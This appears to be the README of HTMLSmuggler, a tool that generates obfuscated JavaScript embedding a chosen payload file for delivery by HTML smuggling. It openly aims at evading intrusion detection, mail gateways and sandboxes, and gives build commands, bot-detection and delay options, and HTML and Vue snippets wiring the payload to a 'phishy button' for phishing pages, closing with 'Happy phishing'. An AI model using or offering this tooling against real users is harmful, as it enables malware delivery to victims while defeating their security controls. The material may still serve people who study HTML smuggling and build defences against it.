HTMLSmuggler - JS payload generator for IDS bypass and payload delivery via HTML smuggling.
The full explanation what is HTML Smuggling may be found here.
The primary objective of HTML smuggling is to bypass network security controls, such as firewalls and intrusion detection systems, by disguising malicious payloads (e.g. executables/archives/etc.) within seemingly harmless HTML and JavaScript code. By exploiting the dynamic nature of web applications, attackers can deliver malicious content to a user's browser without triggering security alerts or being detected by traditional security mechanisms. Thanks to this technique, the download of a malicious file is not displayed in any way in modern IDS solutions.
The main goal of HTMLSmuggler tool is creating an independent javascript library with embedded malicious user-defined payload. This library may be integrated into your phishing sites/email html attachments/etc. to deliver embedded payload to the target user system (bypassing IDS and IPS system). An example of created javascript library may be found here.
- Built-in highly configurable JavaScript obfuscator that fully hides your payload makes it impossible to extract your payload from javascript manually.
- Powerful client-side bots and headless crawlers detection library that doesn't share your payloads with smart secure mail gateways and their friends.
- Delay before loading to avoid sandboxes that are in a hurry.
- May be used both as an independent JS library or embedded in JS frameworks such as React, Vue.js, etc.
- The simplicity of the template allows you to add extra data handlers/compressions/obfuscations.
- Support a lot of browsers (including old IE10).
-
Install yarn package manager.
-
Install dependencies:
yarn
-
Read help message.
yarn build -h
Options: -p, --payload <string> Path to payload file you want to smuggle -n, --name <string> Name of file, that would be downloaded -t, --type <string> Contet-Type of downlonaded file (default: "application/octet-stream") -f, --function <string> Name of exported function (default: "download") -c, --compress Enable payload compression (gzip) -d, --delay <number> Delay before antibot and download in ms (default: 0) -a, --antibot Enable bot detection and block them (recommended) -h, --help display help for command
-
(Optional) Modify javascript-obfuscator options in
obfuscator.js, my preset is nice, but very slow. -
Compile your javascript payload:
⚠️ AVOID USAGE OF PAYLOADS BIGGER THAN 3 MiB (see FAQ)yarn build -p /path/to/payload -n file.exe -t "application/octet-stream" -c -a -d 3000 -
Get your payload from
dist/payload.esm.jsordist/payload.umd.js. After that, it may be inserted into your page and called withdownload()(or custom specified with-fflag) function.payload.esm.jsis used inimport { download } from 'payload.esm';imports (ECMAScript standart).payload.umd.jsis used in html script SRC andrequire('payload.umd');imports (CommonJS, AMD and pure html).
A full example may be found here.
-
Import created script to html file (or insert it inline):
<head> <script src="payload.umd.js"></script> </head>
-
Call
download()function from body:<body> <button onclick="download()">Some phishy button</button> </body>
-
Happy phishing :)
A full example may be found here.
-
Import created script to vue file:
<script> import { download } from './payload.esm'; </script>
-
Call
download()function:<template> <button @click="download()">Some phishy button</button> </template>
-
Happy phishing :)
Q: I have an error RangeError: Maximum call stack size exceeded, how to solve it?
A: This issue described here. To fix it, try to disable splitStrings in obfuscator.js or make smaller payload (it's recommended to use up to 2 MB payloads because of this issue).
Q: Why does my payload build so long?
A: The bigger payload you use, the longer it takes to create a JS file. To decrease time of build, try to disable splitStrings in obfuscator.js. Below is a table with estimated build times using default obfuscator.js.
| Payload size | Build time |
|---|---|
| 525 KB | 53 s |
| 1.25 MB | 8 m |
| 3.59 MB | 25 m |